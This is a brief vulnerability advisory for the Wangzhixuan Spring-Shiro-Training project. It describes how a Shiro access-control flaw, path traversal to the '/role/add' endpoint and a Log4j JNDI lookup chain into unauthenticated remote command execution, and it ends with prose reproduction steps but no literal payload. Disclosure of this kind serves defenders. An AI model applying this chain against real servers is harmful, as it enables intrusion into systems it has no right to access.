Wangzhixuan Spring-Shiro-Training Command Injection Vulnerability

A critical command injection vulnerability has been identified in Wangzhixuan Spring-Shiro-Training versions up to 94812c1fd8f7fe796c931f4984ff1aa0671ab562. This vulnerability arises from improper access control in the Apache Shiro configuration, allowing anonymous access to certain static paths. The issue is present in the frontend API endpoint '/role/add', which can be accessed remotely without authentication. Exploitation involves using path traversal techniques to bypass authentication and reach sensitive areas of the application, followed by leveraging an unsafe Log4j dependency to execute arbitrary commands.

Impact

Exploitation of this vulnerability allows for unauthenticated remote command execution on the server where the application is running.

Reproduction

To reproduce this vulnerability, send a POST request to the '/role/add' endpoint, using path traversal to bypass authentication. Include a payload that exploits the Log4j vulnerability, such as a JNDI lookup that executes a command on the server.